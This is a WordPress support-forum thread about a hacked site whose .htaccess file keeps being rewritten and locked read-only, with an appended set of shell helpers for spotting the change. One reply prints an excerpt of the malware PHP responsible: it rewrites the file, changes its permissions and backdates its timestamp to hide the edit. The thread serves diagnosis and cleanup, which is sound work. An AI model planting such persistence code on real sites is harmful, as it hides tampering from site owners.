• On June 21, my 4-year-old site got hacked for the 1st time. From that day onwards I often see the .htaccess get its permissions changed to read-only and get rewritten. The new content is actually a copy of the normal .htaccess file that comes with any WP installation (not the multisite one).

    I am frustrated. My hosting company too has no clue why this is happening despite all the scanning, cleaning, reinstallation, etc.

    Please help.

Viewing 3 replies - 1 through 3 (of 3 total)
  • Hi,

    If the .htaccess file is still changing after the necessary scanning, that means your website still contains malicious code.

    Download your whole WordPress website to your local system, scan it thoroughly with good, updated anti-virus software, and then upload your web content to the web server.

    You can also restore your website from a good backup made before the hack.

    Quite often, such hacks leave hidden malware in websites that can cause such issues. Here is an example of malware that can change the .htaccess file’s permission to 444 every time you access the website.

    // Excerpt as posted: the opening of the enclosing function is not shown.
    $path = $dir . '/.htaccess';
    // Decodes to the stock single-site WordPress .htaccess rules.
    $content = base64_decode('IyBCRUdJTiBXb3JkUHJlc3MKPElmTW9kdWxlIG1vZF9yZXdyaXRlLmM+ClJld3JpdGVFbmdpbmUgT24KUmV3cml0ZUJhc2UgLwpSZXdyaXRlUnVsZSBeaW5kZXhcLnBocCQgLSBbTF0KUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWYKUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWQKUmV3cml0ZVJ1bGUgLiAvaW5kZXgucGhwIFtMXQo8L0lmTW9kdWxlPgoKIyBFTkQgV29yZFByZXNzCg==');
    if (file_exists($path) AND file_get_contents($path) != $content) {
        chmod($path, 0644);                 // make the file writable
        file_put_contents($path, $content); // overwrite it
        chmod($path, 0444);                 // lock it read-only
        if (!$time) {
            $time = my_time($dir);
        }
        touch($path, $time);                // set the file's timestamp to $time
    }
    }
    my_correct(dirname(__FILE__) . '/..');

    Hope that helps.

    Thanks,

    Thread Starter Ramnath

    (@ramnath007)

    The scan was already performed by my hosting company HG. Still it’s occurring. I actually restore by untarring a clean backup instance of the main folder. So everything happens via the shell access (client: putty).

    But you are very close actually. I saw similar one-liner scripts in the infested files.

    Can’t we see which process/script made these changes so that we can identify the issue?

    Thanks.

    Hi,

    Can’t we see which process/script made these changes so that we can identify the issue?

    Mostly, such hacks or malware injections occur due to poorly written, vulnerable, outdated themes and plugins. Make sure you update all WordPress themes and plugins and remove disabled plugins/themes.

    To determine which files are affected, you can check the modification time of files and folders. After a hack, investigation is perhaps the hardest part and it requires the most work. It will also come down to your individual technical knowledge and insight around website hacks. Below are a few resources that will guide you to completely remove the malware:

    https://z9.io/2008/06/08/did-your-wordpress-site-get-hacked/
    https://blog.sucuri.net/2010/02/removing-malware-from-a-wordpress-blog-case-study.html
    https://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/

    You can also ask your web hosting provider for logs, where you can get extensive information like IP addresses, FTP access logs, modified files, timestamps, etc.

    Thanks,
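
Added example, not part of the thread or written by any of its participants: two shell helpers for the shell-access workflow described above. Because the quoted sample calls touch() on .htaccess after rewriting it, the first helper compares inode change time (ctime) against a marker file instead of relying on modification time; the second lists PHP files that combine the calls seen in the sample. The function names, the marker file and the paths are assumptions, and `-cnewer` requires GNU or BSD find.

```shell
#!/bin/sh
# Added example; helper names, marker file and paths are hypothetical.
#
# Usage (paths are placeholders):
#   touch "$HOME/restore.marker"    # right after untarring the clean backup
#   changed_since "$HOME/public_html" "$HOME/restore.marker"
#   htaccess_writers "$HOME/public_html"

# List files whose inode change time (ctime) is newer than the marker.
# touch() can backdate mtime, as the sample does, but chmod(), a rewrite
# and touch() itself all move ctime forward, and ctime cannot be set back.
changed_since() {
    find "$1" -type f -cnewer "$2"
}

# List PHP files that mention .htaccess and also call both chmod() and
# file_put_contents(), the combination used by the quoted sample.
# Matches are candidates for manual review, not proof of infection.
htaccess_writers() {
    find "$1" -type f -name '*.php' -exec sh -c '
        for f do
            if grep -qF ".htaccess" "$f" &&
               grep -qE "chmod[[:space:]]*\(" "$f" &&
               grep -qE "file_put_contents[[:space:]]*\(" "$f"; then
                printf "%s\n" "$f"
            fi
        done' sh {} +
}
```

Where root access and auditd are available, an audit watch such as `auditctl -w /path/to/.htaccess -p wa -k htaccess` records which process wrote to the file.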

  • The topic ‘.htaccess Gets Rewritten’ is closed to new replies.